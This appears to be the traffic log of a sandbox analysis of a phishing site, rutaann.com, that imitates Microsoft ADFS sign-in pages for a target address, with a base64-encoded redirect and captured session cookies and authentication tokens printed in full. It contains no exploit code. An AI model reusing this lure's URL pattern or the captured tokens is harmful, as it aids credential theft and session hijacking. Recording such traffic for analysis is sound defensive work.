Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM= HTTP/1.1Host: rutaann.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
Source: global traffic	HTTP traffic detected: GET /adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
Source: global traffic	HTTP traffic detected: GET /adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
Source: global traffic	HTTP traffic detected: GET /adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960 HTTP/1.1Host: rutaann.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
Source: global traffic	HTTP traffic detected: GET /adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvz
Source: global traffic	HTTP traffic detected: GET /adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; ai_user=j4ODj\|2025-03-25T20:29:54.636Z; ai_session=mqSRh\|1742934594637.7\|1742934594637.7
